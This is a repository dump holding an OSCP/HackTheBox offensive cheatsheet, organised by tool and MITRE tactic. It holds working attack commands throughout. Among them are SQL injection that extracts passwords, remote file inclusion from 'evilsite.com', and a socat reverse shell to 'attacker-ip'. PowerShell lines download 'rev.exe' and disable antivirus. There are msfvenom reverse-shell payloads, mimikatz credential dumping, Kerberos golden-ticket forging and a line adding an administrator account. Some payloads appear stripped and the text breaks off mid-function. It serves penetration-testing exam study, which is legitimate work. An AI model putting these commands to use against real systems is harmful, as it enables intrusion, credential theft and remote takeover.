[
{
"path": "README.md",
"content": "# OSCP / HackTheBox\n\nThese are my notes and exploits I wrote while preparing for the OSCP and playing CTF on HackTheBox.\n\n## Cheatsheet usage\n\nThe cheatsheet is meant to be as searchable as possible.\nA such you have the following options to search for an entry:\n\n1. You can search for a known **toolname**:\n\t- example: \"gobuster\"\n\t- example: \"rpcclient\"\n2. You can search for the targeted **service**:\n\t- example \"service: smb\"\n\t- example \"service: ftp\"\n3. You can search for **MITRE-tactics**:\n\t- example \"tactics: enumeration\"\n\t- example \"tactics: lateral_movement\"\n4. You can search for tool **suites**:\n\t- example: \"suites: impacket\"\n\t- example: \"suites: powershell_empire\"\n\nSome parts of this document still need some work. Feel free to submit a PR.\n\n\n## Exploit-Development\n\nI moved this folder to it's own [repository](https://github.com/tagnullde/Exploit-Development)\n\n"
},
{
"path": "oscp-cheatsheet.md",
"content": "# OSCP-Cheatsheet\n\n# nmap\n- service: all\n- tactics: enumeration\n\n## enumerate services and use default scripts \n- `nmap -sC -sV -oN normal.txt target-ip`\n\n## scan all tcp ports \n- `nmap -p- -oN all_ports.txt target-ip`\n\n## scan all udp ports \n- `nmap -p- -sU -oN all_udp_ports.txt target-ip`\n\n## use script categories \n- `nmap --script vuln,safe,discovery -oN scan.txt target-ip`\n\n## list all nse scripts \n- `ls -lh /usr/share/nmap/scripts/`\n\n## nmap through socks4 proxy \n- `nmap --proxies socks4://proxy-ip:1080 target-ip`\n\n## ftp bounce scan\n- `nmap -P0 -n -b username:password@target-ip target2-ip --proxies socks4://proxy-ip:1080 -vvvv`\n\n---\n\n# gobuster\n- service: http\n- tactics: enumeration\n\n## bruteforce webdirectories and files by extention\n- `gobuster dir -u http://target-ip -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,txt -t 30`\n\n---\n\n# wfuzz\n- service: http\n- tactics: enumeration\n\n## bruteforce web parameter\n- `wfuzz -u http://target-ip/path/index.php?param=FUZZ -w /usr/share/wordlists/rockyou.txt`\n\n## bruteforce post data (login)\n- `wfuzz -u http://target-ip/path/index.php?action=authenticate -d 'username=admin&password=FUZZ' -w /usr/share/wordlists/rockyou.txt`\n\n---\n\n# fuff\n- service: http\n- tactics: enumeration\n\n## bruteforce web directories\n- `ffuf -w /path/to/wordlist -u https://target/FUZZ`\n\n---\n\n# davtest\n- service: webdav\n- tactics: enumeration\n\n## tries to upload (executable) files to webdav\n- `davtest -url http://target-ip/ -sendbd auto`\n\n---\n\n# peass - privilege escalation awesome scripts suite\n- service: windows\n- service: linux\n- tactics: enumeration\n\n## very easy to use on linux\n- `./linpeas.sh`\n\n## windows has multiple versions\n- `winpeasx64.exe`\n- `winpeasx86.exe`\n- `winpeas.bat`\n\n---\n\n# capabilities\n- service: linux\n- tactics: privilege_escalation\n\n```\n# Check the links at the bottom for more examples and explanation\n```\n## exploit `cap_setuid` capability on python3 to gain a local root-shell\n- `python3 -c 'import os; os.setuid(0); os.system(\"/bin/sh\")'`\n\n---\n\n# mount\n- service: smb\n- tactics: enumeration\n- tactics: inital_access\n\n## mount shares\n- `mount -o hard,nolock target-ip:/home folder`\n- `mount -t cifs -o user=username,domain=domainname //target-ip/share /mnt/folder`\n- `mount -t nfs target-ip:share /mnt/folder -o nolock`\n---\n\n# showmount\n- service: smb\n- tactics: enumeration\n\n## list Shares\n- `showmount -e target-ip`\n\n---\n\n# enum4linux\n- service: all\n- tactics: enumeration\n\n## scan target-ip\n- `enum4linux target-ip`\n\n---\n\n# rpcdump.py\n- service: rpc\n- tactics: enumeration\n- suites: impacket\n\n## dump rpc endpoints\n- `/opt/impacket/examples/rpcdump.py username:password@target-ip`\n\n---\n\n# lookupsid.py\n- service: rpc\n- tactics: enumeration\n- suites: impacket\n\n## get sid via rpc\n- `/opt/impacket/examples/lookupsid.py username:password@target-ip`\n\n---\n\n# smbclient.py\n- service: smb\n- tactics: enumeration\n- tactics: inital_access\n- suites: impacket\n\n## semi-interactive smb-client\n- `python3 /opt/impacket/examples/smbclient.py username@target-ip`\n- `python3 /opt/impacket/examples/smbclient.py 'username'@target-ip`\n- `python3 /opt/impacket/examples/smbclient.py ''@target-ip`\n\n---\n\n# snmpwalk\n- service: snmp\n- tactics: enumeration\n\n## gather snmp v1 information with standard community strings\n- `snmpwalk -v1 -c public target-ip`\n- `snmpwalk -v1 -c private target-ip`\n- `snmpwalk -v1 -c manager target-ip`\n\n## enumerate windows users\n- `snmpwalk -c public -v1 target-ip 1.3.6.1.4.1.77.1.2.25`\n \n## enumerate current windows processes\n- `snmpwalk -c public -v1 target-ip 1.3.6.1.2.1.25.4.2.1.2`\n \n## enumerate windows open tcp ports\n- `snmpwalk -c public -v1 target-ip 1.3.6.1.2.1.6.13.1.3`\n \n## enumerate installed software\n- `snmpwalk -c public -v1 target-ip 1.3.6.1.2.1.25.6.3.1.2`\n\n## make use of MIB files and translate the OIDs automatically\n- default folder for MIB files: `/usr/share/snmp/mibs`\n- `export MIBS=ALL`\n\n---\n\n# onesixtyone\n- service: snmp\n- tactics: enumeration\n\n## bruteforce community strings\n```\necho public > community.txt\necho private >> community.txt\necho manager >> community.txt\nfor ip in $(seq 200 254); do echo 1.2.3.${ip}; done > target-ip.txt\n```\n\n- `onesixtyone -c community.txt -i target-ip.txt`\n\n---\n\n# rpcclient\n- service: rpc \n- tactics: enumeration\n- tactics: inital_access\n\n## get information via rpc with username\n- `rpcclient -U username target-ip`\n\n## get information via rpc without username\n- `rpcclient -U \"\" target-ip`\n\n### sub-commands once connected\n- `srvinfo`\n- `lookupnames username`\n\n---\n\n# ftp\n- service: ftp\n- tactics: enumeration\n- tactics: inital_access\n\n## login via ftp\n- `ftp target-ip`\n\n### anonymous login\n- `username: anonymous`\n- `password: anonymous`\n\n---\n\n# XML External Entity (XXE)\n\n- service: http\n- tactics: enumeration\n- tactics: inital_access\n\n## Read local files\n\n```xml\n\n]>\n \n &xxe;\n \n```\n\n## Read binary or files that otherwise can't be display (.php)\n\n```xml\n\n]>\n \n &xxe;\n \n```\n\n---\n\n# Java-Web-Token (JWT)\n\n- service: http\n- tactics: inital_access\n\n## Sign JWT with own key - might need a webserver serving the private key\n\n```python\npython3 jwt_tool.py [eyJ0eXAiOiJKV1QiLCJhbG..snip..] -I -hc kid -hv \"http:///jwt.pub\" -pc -pv <1> -S rs256 -pr jwt.key\n```\n\n---\n\n# ldapsearch\n- service: ldap\n- tactics: discovery\n\n`ldapsearch -x -h target-ip -b \"dc=domain,dc=tld\"`\n\n---\n\n# windapsearch.py\n- service: ldap\n- tactics: discovery\n\n# \n- `./windapsearch.py -d host.domain.tld -u domain\\\\ldapbind -p password -U`\n\n---\n\n# evil-winrm\n- service: winrm\n- tactics: lateral_movement\n\n# get shell via evil-winrm\n- `./evil-winrm.rb -u username -p password -i target-ip`\n\n---\n\n# telnet\n- service: smtp\n- service: pop\n- serivce: telnet\n- tactics: collection\n\n## send mail via telnet\n\n```\n# connect\ntelnet target-ip 25\n\n# provide valid or fake email-address\nEHLO username@domain.tld\n\n# set mail-from\nMAIL FROM: \n\n# set recipient-to\nRCPT TO: \n\n# set body and sent mail\nDATA\n354 Ok Send data ending with .\nFROM: username@domain\n\nHallo World!\n.\n```\n\n## get mails via pop3\n\n```\n# connect\ntelnet target-ip 110\n\n# login\nUSER username\nPASS password\n\n# list emails\nLIST\n\n# retrieve emails\nRETR 1\n```\n\n---\n\n# smtp-user-enum\n- service: smtp\n- tactics: enumeration\n\n## verify that user exists on system with higher delay to make sure we get all responses\n- `smtp-user-enum -M VRFY -U user-file -t target-ip -m 60 -w 20`\n\n---\n\n# nikto\n- service: http\n- tactics: enumeration\n\n## scan website for vulnerabilities\n- `nikto -C all -h http://target-ip`\n\n---\n\n# wpscan\n- service: http\n- tactics: enumeration\n\n## scan wordpress installation for vulnerabilities\n- `wpscan --url http://target-ip/ --enumerate p`\n\n---\n\n# nc\n- service: all\n- tactics: enumeration\n- tactics: inital_access\n\n## logfile injection\n```\nnc target-ip target-port\nGET / HTTP/1.1\nHost: \nConnection: close\n```\n \n### Afterwards include the it via lfi\n- `?lfi_file=/var/log/apache2/access.log&cmd=`\n\n---\n\n# dig\n- service: dns\n- tactics: enumeration\n\n## full zone transfer\n- `dig -t AXFR target-dns-ip`\n\n---\n\n# host\n- service: dns\n- tactics: enumeration\n\n## full zone transfer\n- `host -l target-dns-ip`\n\n---\n\n# mysqldump\n- service: sql\n- tactics: initial_access\n\n## backup all mysql databases\n- `mysqldump -u username -ppassword --all-databases --single-transaction`\n\n---\n\n# sqli\n- service: sql\n- service: http\n- tactics: inital_access\n\n## check if you can find a row, where you can place your output \n- `http://target-ip/inj.php?id=1 union all select 1,2,3,4,5,6,7,8`\n\n## get the version of the database \n- `http://target-ip/inj.php?id=1 union all select 1,2,3,@@version,5`\n\n## get the current user \n- `http://target-ip/inj.php?id=1 union all select 1,2,3,user(),5`\n\n## see all tables \n- `http://target-ip/inj.php?id=1 union all select 1,2,3,table_name,5 FROM information_schema.tables`\n\n## get column names for a specified table \n- `http://target-ip/inj.php?id=1 union all select 1,2,3,column_name,5 FROM information_schema.columns where table_name='users'`\n\n## concat user names and passwords (0x3a represents “:”) \n- `http://target-ip/inj.php?id=1 union all select 1,2,3,concat(name, 0x3A , password),5 from users`\n\n## write into a file \n- `http://target-ip/inj.php?id=1 union all select 1,2,3,\"content\",5 into OUTFILE 'outfile'`\n\n---\n\n# searchsploit\n- service: all\n- tactics: enumeration\n\n# filter search for specific kernel versions\n- `searchsploit privilege | grep -i linux | grep -i kernel | grep 2.6`\n\n---\n\n# curl\n- service: http\n- service: imap\n- tactics: exfiltration\n\n## download emails via curl\n- `curl --insecure --url \"imaps://target-domain/Drafts;UID=4\" --user \"username:password\"`\n\n## bypass useragent blacklisting\n- `curl -A \"Googlebot\" http://target-ip/robots.txt`\n\n---\n\n# scp\n- service: ssh\n- tactics: inital_access\n\n## copy file to target\n- `scp -r username@target-ip:/path/to/foo /home/username/desktop/`\n\n---\n\n# ssh\n- service: ssh\n- tactics: inital_access\n- tactics: lateral_movement\n\n## create ssh-key\n- `ssh-keygen`\n\n### add public-key to authorized_keys\n- `cat rsa.pub >> authorized_keys`\n\n### set permission on private-key\n- `chmod 600 id_rsa`\n\n## login via ssh-key\n- `ssh -i id_rsa username@target-ip`\n\n### login with older ciphers\n- `ssh -oKexAlgorithms=+diffie-hellman-group1-sha1 -c aes128-cbc username@target-ip`\n\n## start tool after ssh login\n- `ssh username@target-ip -o \"ProxyCommand=ncat --proxy-type http --proxy target-ip:proxy-port 127.0.0.1 22\"`\n\n## ssh port forwarding\n- `ssh -N -L 80:127.0.0.1:80 username@target-ip`\n\n## dynamic ssh port forward\n- `ssh -N -D 9050 username@target-ip`\n\n---\n\n# proxychains\n- service: ssh\n- tactics: lateral_movement\n\n## a dynamic ssh tunnel is needed\n> search ssh\n\n## Use `proxychains + command\" to use the socks proxy\n- `proxychains nmap -sTV -n -PN -p 80,22 target-ip -vv`\n \n> Double pivot works the same, but you create the 2nd ssh tunnel via proxychains and a different dynamic port. \nAfter the tunnel is up, you can comment out the first socks entry in proxychains config.\n\n---\n\n# sshuttle\n- service: ssh\n- tactics: lateral_movement\n\n## pivot via sshuttle\n- `sshuttle -vr `\n- `sshuttle -vr username@target-ip 10.1.1.0/24`\n\n---\n\n# smbmap\n- service: smb\n- tactics: discovery\n\n## guest login\n- `smbmap -u whateverusername -H target-ip`\n\n## anonymous login\n- `smbmap -H target-ip`\n\n---\n\n# smbserver.py\n- service: smb\n- tactics: exfiltration\n- suites: impacket\n\n## fake smb server for uploading and downloading files\n- `python3 /opt/impacket/examples/smbserver.py -smb2support files $(pwd)`\n\n---\n\n# pth-smbclient\n- service: smb\n- service: ntlm\n- tactics: lateral_movement\n- suites: pth-toolkit\n\n## connect to target-share and auth via ntlm-hash\n- `pth-smbclient --user=username --pw-nt-hash -m smb3 \\\\\\\\target-ip\\\\target-share ntlm-hash`\n\n---\n\n# pth-winexe\n- service: smb\n- service: ntlm\n- tactics: lateral_movement\n- suites: pth-toolkit\n\n# run command on target-ip and auth via ntlm-hash\n- `pth-winexe -U ntlm-hash //target-ip cmd`\n\n---\n\n# vinagre\n- service: vnc\n- tactics: lateral_movement\n\n# vnc connect\n- `vinagre`\n\n---\n\n# medusa\n- service: http\n- service: basic_auth\n- tactics: credential_access\n\n## bruteforce basic_auth\n- `medusa -h target-ip -U ../creds/usernames.txt -P ../creds/passwords.txt -M http -m DIR:/printers -T 10`\n\n---\n\n# hydra\n- service: http\n- service: http_post\n- service: sql\n- tactics: credential_access\n\n## bruteforce http_post with example post-data\n- `hydra -l root@localhost -P /usr/share/wordlists/rockyou.txt target-ip http-post-form \"/otrs/index.pl:Action=Login&RequestedURL=&Lang=en&TimeOffset=-60&User=^USER^&Password=^PASS^:\nLogin failed!\"`\n\n## bruteforce mssql\n- `hydra -l sa -P ../creds/pass.txt target-ip -s target-port mssql`\n\n---\n\n# patator\n- service: ssh\n- tactics: credential_access\n\n## bruteforce ssh\n- `patator ssh_login host=target-ip port=22 user=username password=FILE0 0=/opt/SecLists/Passwords/probable-v2-top1575.txt`\n- Optional: `-x ignore:fgrep='failed.'`\n\n---\n\n# burp\n- service: http\n- tactics: enumeration\n\n## bypass ip blacklist / whitelist\n- `X-Forwarded-For: $allowed-ip`\n\n---\n\n# xss payloads\n- service: http\n- tactics: inital_access\n\n## xss enumeration payloads\n- `'\">>`\n- `'\">>`\n- `'\">>`\n\n## xss redirect to own webserver\n- `'\">>`\n- `'\">>`\n\n---\n\n# local file inclusion / remote file inclusion\n- service: http\n- service: php\n- tactics: inital_access\n\n## including remote code\n- `?file=[http|https|ftp]://evilsite.com/shell.txt`\n\n## using php stream php://input \n- `?file=php://input` \n\n## using zip wrapper zip://input \n- `?file=zip://path/file.zip%23rce.php`\n\n## specify your payload in the post parameters\n### using php stream php://filter\n- `?file=php://filter/convert.base64-encode/resource=index.php`\n\n### using data uri\n- `?file=data://text/plain;base64,SSBsb3ZlIFBIUAo=`\n\n### using xss\n- `?file=http://127.0.0.1/path/xss.php?xss=phpcode`\n\n## inject php code in logfile with nc and retrieve it afterwards\n> search for nc\n\n--- \n\n# mssqlclient.py\n- service: sql\n- tactics: lateral_movement\n- suites: impacket\n\n## connect to windows mssql Server\n- `mssqlclient.py -windows-auth username@target-ip`\n\n## list all databases\n- `select name from sys.databases`\n- `select name from master.dbo.sysdatabases`\n\n## use database\n- `use [database]`\n\n## get tables \n- `select * from [database].information_schema.tables`\n---\n\n# mssql-cli\n- service: sql\n- tactics: lateral_movement\n\n## connect to windows mssql Server\n- `mssql-cli -S target-ip -U username`\n\n---\n\n# bloodhound\n- service: ldap\n- serivce: active_directory\n- tactics: lateral_movement\n- tactics: privilege_escalation\n\n## invoke-bloodhound from sharphound.ps1 \n- `import-module .\\sharphound.ps1`\n- `invoke-bloodHound -CollectionMethod All -domain target-domain -LDAPUser username -LDAPPass password`\n\n---\n\n# getnpusers.py\n- service: kerberos\n- tactics: credential_access\n- tactics: lateral_movement\n\n## check ASREPRoast for all domain users (credentials required)\n- `python GetNPUsers.py /: -request -format -outputfile `\n\n## check ASREPRoast for a list of users (no credentials required)\n- `python GetNPUsers.py / -usersfile -format -outputfile `\n\n## check kerberoast\n- `impacket-GetUserSPNs '/:' -dc-ip -request`\n\n## crack as_rep_response_file\n> search for hashcat / john\n\n---\n\n# hashcat\n- service: all\n- tactics: credential_access\n\n## crack as_rep_response_file (asreproast)\n- `hashcat -m 18200 -a 0 as_rep_response_file passwords_file`\n\n## crack as_rep_response_file (kerberoast)\n- `hashcat -m 13100 --force TGSs_file passwords_file`\n\n--- \n\n# john\n- service: all\n- tactics: credential_access\n\n## crack as_rep_response_file (asreproast)\n- `john --wordlist=passwords_file as_rep_response_file`\n\n## crack as_rep_response_file (kerberoast)\n- `john --format=krb5tgs --wordlist=passwords_file AS_REP_responses_file`\n\n## mangle wordlist\n- `john --wordlist=month --rules --stdout > new_list`\n\n## crack ssh keys\n- `/usr/share/john/ssh2john.py id_rsa > hash.john`\n- `john --wordlist=/usr/share/wordlists/rockyou.txt hash.john`\n\n---\n\n# secretsdump.py\n- service: kerberos\n- tactics: credential_access\n- suites: impacket\n\n## dcsync\n- `/usr/share/doc/python3-impacket/examples/secretsdump.py username@target-ip -dc-ip target-ip`\n\n---\n\n# invoke-kerberoast.ps1\n- service: kerberos\n- tactics: credential_access\n- suites: powershell_empire\n\n## execute invoke-kerberoast.ps1\n- `invoke-kerberoast -OutputFormat | % { $_.Hash } | Out-File -Encoding ASCII `\n\n---\n\n# gettgt.py\n- service: kerberos\n- tactics: credential_access\n- suites: impacket\n\n## overpass the hash\n\n## Request the TGT with hash\n- `python getTGT.py / -hashes [lm_hash]:`\n\n## Request the TGT with aesKey (more secure encryption, probably more stealth due is the used by default by Microsoft)\n- `python getTGT.py / -aesKey `\n\n## Request the TGT with password\n- `python getTGT.py /:[password]`\n\n## Set the TGT for impacket use\n- `export KRB5CCNAME=`\n\n### Execute remote commands with any of the following tools by using the TGT\n> search for psexec.py, smbexec.py or wmiexec.py\n\n---\n\n# ticket_converter.py\n- service: kerberos\n- tactics: credential_access\n\n## convert tickets between linux / windows format\n[ticket_converter.py](https://github.com/Zer1t0/ticket_converter):\n\n- `python ticket_converter.py ticket.kirbi ticket.ccache`\n- `python ticket_converter.py ticket.ccache ticket.kirbi`\n\n### to use ticket \n> search for gettgt.py \n\n---\n\n# mimikatz\n- service: kerberos\n- tactics: credential_access\n\n## enable log\n- `log filename.log`\n\n## enable debug mode\n- `privilege::debug`\n\n## dump passwords from memory\n- `sekurlsa::logonpasswords`\n\n## dump passwords from sam database\n- `lsadump::sam /system:f:\\SYSTEM /sam:f:\\SAM`\n\n## export tickets\n- `sekurlsa::tickets /export`\n\n## pass the hash\n- `sekurlsa::pth /user:username /domain:domain.tld /ntlm:ntlm_hash`\n\n## silver_ticket\n### to generate the TGS with NTLM\n- `mimikatz # kerberos::golden /domain:/sid: /rc4: /user: /service: /target:`\n\n### to generate the TGS with AES 128 key\n- `mimikatz # kerberos::golden /domain:/sid: /aes128: /user: /service: /target:`\n\n### to generate the TGS with AES 256 key (more secure encryption, probably more stealth due is the used by default by Microsoft)\n- `mimikatz # kerberos::golden /domain:/sid: /aes256: /user: /service: /target:`\n\n### Inject TGS with mimikatz\n- `mimikatz # kerberos::ptt `\n\n## golden_ticket\n\n### to generate the TGT with NTLM\n- `mimikatz # kerberos::golden /domain:/sid: /rc4: /user:`\n\n### to generate the TGT with AES 128 key\n- `mimikatz # kerberos::golden /domain:/sid: /aes128: /user:`\n\n### to generate the TGT with AES 256 key (more secure encryption, probably more stealth due is the used by default by Microsoft)\n- `mimikatz # kerberos::golden /domain:/sid: /aes256: /user:`\n\n### inject TGT with mimikatz\n- `mimikatz # kerberos::ptt `\n\n---\n# ticketer.py\n- service: kerberos\n- tactics: credential_access\n- suites: impacket\n\n## silver_ticket\n\n### to generate the TGS with NTLM\n- `python ticketer.py -nthash -domain-sid -domain -spn `\n\n### to generate the TGS with AES key\n- `python ticketer.py -aesKey -domain-sid -domain -spn `\n\n### set the TGT for impacket use\n- `export KRB5CCNAME=`\n\n## golden_ticket\n\n### to generate the TGT with NTLM\n- `python ticketer.py -nthash -domain-sid -domain `\n\n### to generate the TGT with AES key\n- `python ticketer.py -aesKey -domain-sid -domain `\n\n### set the ticket for impacket use\n- `export KRB5CCNAME=`\n\n> search for psexec.py, smbexec.py or wmiexec.py\n\n---\n\n# psexec.py\n- service: rpc\n- tactics: lateral_movement\n- suites: impacket\n\n## Execute remote commands with any of the following by using the TGT\n- `python psexec.py /@ -k -no-pass`\n\n---\n# smbexec.py\n- service: smb\n- tactics: lateral_movement\n- suites: impacket\n\n## Execute remote commands with any of the following by using the TGT\n- `python smbexec.py /@ -k -no-pass`\n\n---\n\n# wmiexec.py\n- service: wmi\n- tactics: lateral_movement\n- suites: impacket\n\n## Execute remote commands with any of the following by using the TGT\n- `python wmiexec.py /@ -k -no-pass`\n\n---\n\n# psexec.exe\n- service: smb\n- tactics: lateral_movement\n- suites: pstools\n\n## run psexec\n- `.\\PsExec.exe -accepteula \\\\ cmd`\n- `PsExec64.exe \\\\remote_hostname> -u -p shell64.exe`\n\n---\n\n# gcc\n- service: all\n- tactics: weaponization\n\n## cross compile for 32bit (m32) and all linux flavors (gnu, sysv)\n- `apt-get install libc6-dev-i386`\n- `gcc -m32 -Wall -Wl,--hash-style=both 9545.c -o exploit`\n\n## cross compile for 32Bit windows (on 64bit linux)\n- `i686-w64-mingw32-gcc -o ms11-046.exe ms11-046.c -lws2_32`\n\n## cross compile for 32bit windows (on 32bit linux)\n- `apt-get install mingw32`\n- `i586-mingw32msvc-gcc .c -o -lws2_32`\n\n## static application\n> To compile static applications use the “-static” parameter additionally\n\n## skelleton c code which calls system()\n\n```\n#include \nint main ()\n{\nint i;\n i = system(\"net localgroup administrators theusername /add\");\nreturn 0;\n}\n```\n\n---\n\n# pyinstaller.py\n- serivce: all\n- tactics: weaponization\n\n## generate exe from python file in windows\n- `python pyinstaller.py --onefile `\n\n---\n\n# reg.exe\n- service: sam\n- tactics: credential_access\n\n## dump sam database\n- `reg save HKLM\\sam sam`\n- `reg save HKLM\\system system`\n\n## query vnc passwords\n- `reg query \"HKCU\\Software\\ORL\\WinVNC3\\Password\"`\n\n## Windows autologin\n- `reg query \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\Currentversion\\Winlogon\"`\n- `reg query \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\Currentversion\\Winlogon\" 2>nul | findstr \"DefaultUserName DefaultDomainName DefaultPassword\"`\n\n---\n\n# samdump2\n- service: sam\n- tactics: credential_access\n\n- `samdump2 SYSTEM SAM > hashes.db`\n\n---\n\n# unshadow\n- service: sam\n- tactics: credential_access\n\n## unshadow /etc/passwd file\n- `unshadow shadow passwd > unshadow.db`\n\n---\n\n# plink.exe\n- service: all\n- tactics: lateral_movement\n\n## Port forward using plink\n- `plink.exe -l username -pw password target-ip -R 8080:127.0.0.1:8080`\n\n---\n\n# socat\n- serivce: all\n- tactics: command_and_control\n\n# reverse_shell\n## attacker\n- ``socat file:`tty`,raw,echo=0 tcp-listen:12345``\n\n## target:\n- `socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:attacker-ip:12345\"`\n\n---\n\n# runas\n- serivce: windows\n- tactics: privilege_escalation\n\n## privileged file copy\n- `runas /user:hostname\\Administrator /savecred \"cmd.exe /c type c:\\users\\administrator\\desktop\\root.txt > C:\\Users\\security\\AppData\\Local\\Temp\\root.txt\"`\n\n## privileged powershell execution\n- `runas /user:hostname\\Administrator /savecred \"powershell -ExecutionPolicy Bypass -File C:\\Users\\security\\AppData\\Local\\Temp\\boom.ps1\"`\n\n## privileged cmd execution\n- `runas /user:administrator /savecreds cmd.exe`\n\n---\n\n## powershell\n- serivce: windows\n- tactics: execution\n\n### powershell upload\n- `powershell Invoke-WebRequest \"http://attacker-ip:81/x41.csproj\" -OutFile \"C:\\ProgramData\\x41.csproj\"`\n- `powershell.exe -ExecutionPolicy Bypass -NoLogo -NonInteractive -NoProfile -WindowStyle Hidden -Command \"(New-Object System.Net.WebClient).DownloadFile('http://attacker-ip/rev.exe', 'C:\\ProgramData\\')\"`\n\n### powershell disable av \n- `Set-MpPreference -DisableRealtimeMonitoring $true`\n\n---\n\n# potato.exe\n- serivce: windows\n- tactics: privilege_escalation\n\n## hot potato usage\n- `potato.exe -ip -cmd \"c:\\\\windows\\\\system32\\\\cmd.exe /K net users username password /add\" -disable_exhaust true`\n\n---\n\n# Metasploit\n- serivce: all\n- tactics: command_and_control\n\n## Port forward using meterpreter\n- `portfwd add -l -p -r `\n- `portfwd add -l 3306 -p 3306 -r 192.168.1.101`\n\n---\n\n# msfvenom\n- serivce: all\n- tactics: weaponization\n\n## Linux ELF binary\n- `msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST= LPORT= -f elf > shell.elf`\n\n## Windows EXE binary \n- `msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f exe > shell.exe`\n\n### 32 Bit\n- `msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp lhost=10.10.12.XX lport=1337 -f exe > shell32.exe`\n\n### 64Bit\n- `msfvenom -a x64 --platform Windows -p windows/x64/meterpreter/reverse_tcp lhost=10.10.12.XX lport=1337 -f exe > shell64.exe`\n \n## Windows Service\n- `msfvenom -p windows/meterpreter_reverse_tcp LHOST= LPORT= EXITFUNC=thread -f exe-service > shell-service.exe`\n \n## Mac\n- `msfvenom -p osx/x86/shell_reverse_tcp LHOST= LPORT= -f macho > shell.macho`\n \n## PHP \n- `msfvenom -p php/meterpreter/reverse_tcp LHOST= LPORT= -f raw > /tmp/shell.php && sed -i 's/# If you use php/reverse_php open the output file with an editor and add `` within the script.\n \n## ASP \n- `msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f asp > shell.asp` \n\n## JSP\n- `msfvenom -p java/jsp_shell_reverse_tcp LHOST= LPORT= -f raw > shell.jsp`\n \n## WAR\n- `msfvenom -p java/jsp_shell_reverse_tcp LHOST= LPORT= -f war > shell.war`\n \n## Inject payload into an existing exe file\n- `msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -x -f exe > ` \n\n## dep bypass payload\n- `windows/meterpreter/reverse_nonx_tcp`\n\n## multi handler\n```\nmsfconsole\nuse exploit/multi/handler\nset payload windows/meterpreter/reverse_tcp\nset AutoRunScript post/windows/manage/migrate\nset lhost 10.10.12.102\nset lport 9001\nexploit\n```\n--- \n\n# misc\n## python injected shell\n- `__builtins__.__import__('os').system('/bin/bash -i')`\n\n# exploit development\n## finding offset\n### gef\n- `pattern create 128`\n- `pattern search 0x6161616`\n\n### msf\n- `/usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 1000`\n- `/usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -q `\n\n### pwntools\n```python3\nfrom pwn import *\n# n = 4 == 32Bit; n = 8 == 64 Bit\ncyclic(128, n=4)\ncyclic_find('6161616', n=4)\nWhere 61616161 = value not address\n```\n\n# find \"jmp esp\" with mona.py\n- `!mona find -type instr -s \"jmp esp\" -m `\n\n# list of bad characters\n```python\nb'\\x00\\x01\\x02\\x03\\x04\\x05\\x06\\x07\\x08\\x09\\x0a\\x0b\\x0c\\x0d\\x0e\\x0f\\x10\\x11\\x12\\x13\\x14\\x15\\x16\\x17\\x18\\x19\\x1a\\x1b\\x1c\\x1d\\x1e\\x1f\\x20\\x21\\x22\\x23\\x24\\x25\\x26\\x27\\x28\\x29\\x2a\\x2b\\x2c\\x2d\\x2e\\x2f\\x30\\x31\\x32\\x33\\x34\\x35\\x36\\x37\\x38\\x39\\x3a\\x3b\\x3c\\x3d\\x3e\\x3f\\x40\\x41\\x42\\x43\\x44\\x45\\x46\\x47\\x48\\x49\\x4a\\x4b\\x4c\\x4d\\x4e\\x4f\\x50\\x51\\x52\\x53\\x54\\x55\\x56\\x57\\x58\\x59\\x5a\\x5b\\x5c\\x5d\\x5e\\x5f\\x60\\x61\\x62\\x63\\x64\\x65\\x66\\x67\\x68\\x69\\x6a\\x6b\\x6c\\x6d\\x6e\\x6f\\x70\\x71\\x72\\x73\\x74\\x75\\x76\\x77\\x78\\x79\\x7a\\x7b\\x7c\\x7d\\x7e\\x7f\\x80\\x81\\x82\\x83\\x84\\x85\\x86\\x87\\x88\\x89\\x8a\\x8b\\x8c\\x8d\\x8e\\x8f\\x90\\x91\\x92\\x93\\x94\\x95\\x96\\x97\\x98\\x99\\x9a\\x9b\\x9c\\x9d\\x9e\\x9f\\xa0\\xa1\\xa2\\xa3\\xa4\\xa5\\xa6\\xa7\\xa8\\xa9\\xaa\\xab\\xac\\xad\\xae\\xaf\\xb0\\xb1\\xb2\\xb3\\xb4\\xb5\\xb6\\xb7\\xb8\\xb9\\xba\\xbb\\xbc\\xbd\\xbe\\xbf\\xc0\\xc1\\xc2\\xc3\\xc4\\xc5\\xc6\\xc7\\xc8\\xc9\\xca\\xcb\\xcc\\xcd\\xce\\xcf\\xd0\\xd1\\xd2\\xd3\\xd4\\xd5\\xd6\\xd7\\xd8\\xd9\\xda\\xdb\\xdc\\xdd\\xde\\xdf\\xe0\\xe1\\xe2\\xe3\\xe4\\xe5\\xe6\\xe7\\xe8\\xe9\\xea\\xeb\\xec\\xed\\xee\\xef\\xf0\\xf1\\xf2\\xf3\\xf4\\xf5\\xf6\\xf7\\xf8\\xf9\\xfa\\xfb\\xfc\\xfd\\xfe\\xff'\n```\n\n# gdb\n## list memory of process\n- `info files`\n\n## find \"jmp esp\" with gdb\n- `find /b , , 0xff, 0xe4`\n\n## list shared modules\n- `info sharedlibrary`\n\n## serve binary via network\n- `socat TCP-LISTEN:1337,nodelay,reuseaddr,fork EXEC:\"stdbuf -i0 -o0 -e0 ./binary\"`\n\n\n# helper functions\n```python\nimport struct\n\ndef p64(x):\n return pack(\"